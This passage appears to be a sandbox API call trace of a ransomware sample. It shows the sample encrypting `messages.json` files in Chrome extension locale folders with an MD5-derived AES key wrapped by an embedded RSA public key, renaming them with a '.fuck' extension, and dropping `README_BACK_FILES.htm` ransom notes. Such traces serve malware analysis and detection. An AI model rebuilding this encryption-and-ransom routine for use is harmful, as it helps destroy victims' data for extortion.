dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.944] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.944] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298ae98) returned 1 [0251.945] CryptImportPublicKeyInfo (in: hCryptProv=0x298ae98, dwCertEncodingType=0x1, pInfo=0x2992ab0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992ae0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992ae8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984260) returned 1 [0251.945] CryptEncrypt (in: hKey=0x2984260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.945] CryptEncrypt (in: hKey=0x2984260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a590*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a590*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.945] WriteFile (in: hFile=0x5d64, lpBuffer=0x298a590*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a590*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.947] CryptEncrypt (in: hKey=0x2984060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.947] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.947] CloseHandle (hObject=0x5d5c) returned 1 [0251.948] CloseHandle (hObject=0x5d64) returned 1 [0251.948] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0251.951] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0251.952] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0251.953] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0251.954] CryptDestroyHash (hHash=0x29846a0) returned 1 [0251.954] CryptDestroyKey (hKey=0x2984060) returned 1 [0251.954] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.954] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.954] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.954] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0251.955] AreFileApisANSI () returned 1 [0251.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0251.955] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.955] GetFileType (hFile=0x5d60) returned 0x1 [0251.955] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.957] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.957] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.957] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.957] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.957] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.957] GetLastError () returned 0x0 [0251.957] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json")) returned 0x20 [0251.958] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0251.959] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.959] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.960] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.960] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.963] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.963] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.963] CryptHashData (hHash=0x2984560, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.963] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984560, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984720) returned 1 [0251.963] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.963] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.963] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298a7b0) returned 1 [0251.964] CryptImportPublicKeyInfo (in: hCryptProv=0x298a7b0, dwCertEncodingType=0x1, pInfo=0x29925d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992600*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992608*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29844a0) returned 1 [0251.964] CryptEncrypt (in: hKey=0x29844a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.964] CryptEncrypt (in: hKey=0x29844a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298af20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298af20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.964] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298af20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298af20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.967] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.968] CryptEncrypt (in: hKey=0x2984720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.968] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.968] CloseHandle (hObject=0x5d64) returned 1 [0251.968] CloseHandle (hObject=0x5d5c) returned 1 [0251.968] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0251.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0251.972] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0251.974] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0251.975] CryptDestroyHash (hHash=0x2984560) returned 1 [0251.975] CryptDestroyKey (hKey=0x2984720) returned 1 [0251.975] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.975] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.975] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.975] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0251.975] AreFileApisANSI () returned 1 [0251.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.975] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.976] GetFileType (hFile=0x5d60) returned 0x1 [0251.976] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.977] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.978] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.978] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.978] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.978] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.978] GetLastError () returned 0x0 [0251.978] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json")) returned 0x20 [0251.978] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json", dwFileAttributes=0x80) returned 1 [0251.979] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.980] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.981] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.982] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.984] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.984] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.984] CryptHashData (hHash=0x29842e0, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.984] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29842e0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29846a0) returned 1 [0251.984] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.984] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.984] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298afa8) returned 1 [0251.985] CryptImportPublicKeyInfo (in: hCryptProv=0x298afa8, dwCertEncodingType=0x1, pInfo=0x2992840*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992870*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992878*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984560) returned 1 [0251.985] CryptEncrypt (in: hKey=0x2984560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.985] CryptEncrypt (in: hKey=0x2984560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a618*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a618*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.985] WriteFile (in: hFile=0x5d64, lpBuffer=0x298a618*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a618*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.987] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.988] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.988] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.988] CloseHandle (hObject=0x5d5c) returned 1 [0251.988] CloseHandle (hObject=0x5d64) returned 1 [0251.988] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), bFailIfExists=0) returned 1 [0251.992] SetFileAttributesA 